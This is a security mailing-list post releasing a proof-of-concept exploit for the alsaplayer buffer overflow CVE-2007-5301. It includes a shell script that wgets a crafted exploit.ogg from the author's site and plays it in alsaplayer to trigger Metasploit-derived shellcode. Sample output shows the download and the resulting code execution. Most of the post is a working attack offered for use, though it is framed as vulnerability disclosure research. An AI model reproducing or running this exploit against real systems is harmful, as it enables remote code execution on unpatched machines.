Hello,
I have released this PoC for the alsaplayer bug CVE-2007-5301.
You can find all the needed files at http://www.wekk.net/research/CVE-2007-5301/
#!/bin/sh
Exploit for alsaplayer before 0.99.80-rc3. Tested with the debian etch package
alsaplayer-common at version 0.99.76-9
CVE-2007-5301 / DSA-1538
by Albert Sellares <whats[at]wekk[dot]net> - http://www.wekk.net
2008-04-09
Shellcode is based on metasploit framework. If you want to test it in other
systems, maybe you have to recalculate offsets.
Example:
whats@debian:~$ ./CVE-2007-5301-exploit.sh
Alsaplayer buffer overflow < 0.99.80-rc3
by Albert Sellares <whats[at]wekk[dot]net> - http://www.wekk.net
=> `exploit.ogg'
Connecting to www.wekk.net|64.22.71.90|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 5,421 (5.3K) [application/ogg]
100%[===============================================================================>] 5,421
12:19:28 (37.00 KB/s) - `exploit.ogg' saved [5421/5421]
uid=1000(whats) gid=1000(whats) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(whats)
echo -e "Alsaplayer buffer overflow < 0.99.80-rc3"
echo -e "by Albert Sellares <whats[at]wekk[dot]net> - http://www.wekk.net\n\n"
wget http://www.wekk.net/research/CVE-2007-5301/exploit.ogg
alsaplayer exploit.ogg
–
Albert Sellares GPG id: 0x13053FFE
http://www.wekk.net [email protected]
Membre de Catux.org http://catux.org
Linux User: 324456 Catalunya